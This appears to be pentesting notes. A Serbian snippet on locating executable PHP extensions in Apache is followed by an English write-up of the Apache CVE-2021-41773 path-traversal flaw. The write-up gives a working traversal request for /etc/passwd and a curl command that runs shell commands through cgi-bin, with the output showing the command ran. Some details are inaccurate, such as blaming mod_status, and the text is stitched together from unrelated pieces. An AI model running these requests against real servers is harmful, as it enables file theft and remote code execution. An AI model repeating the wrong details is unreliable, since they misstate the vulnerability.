Izvršivi PHP ekstenzije

Proverite koje ekstenzije izvršava Apache server. Da biste ih pretražili, možete izvršiti:

grep -R -B1 "httpd-php" /etc/apache2

Takođe, neka mesta gde možete pronaći ovu konfiguraciju su:

/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf

CVE-2021-41773

Description

Apache HTTP Server (httpd) is an open-source web server software. A vulnerability, known as CVE-2021-41773, has been discovered in Apache HTTP Server versions 2.4.49 and prior. This vulnerability allows remote attackers to execute arbitrary code and gain unauthorized access to the targeted system.

Exploitation

To exploit this vulnerability, an attacker can send a specially crafted HTTP request to the server, targeting the vulnerable mod_status module. By including a path traversal sequence in the request, the attacker can access files outside the web root directory.

The following request can be used to exploit the vulnerability:

GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: example.com

This request attempts to access the /etc/passwd file, which contains sensitive system information, such as user account details.

Mitigation

To mitigate this vulnerability, it is recommended to upgrade to Apache HTTP Server version 2.4.50 or later. Additionally, it is advised to restrict access to the mod_status module or disable it if not required.

References

• CVE-2021-41773 - Apache HTTP Server Path Traversal Vulnerability

• Apache HTTP Server Documentation

curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux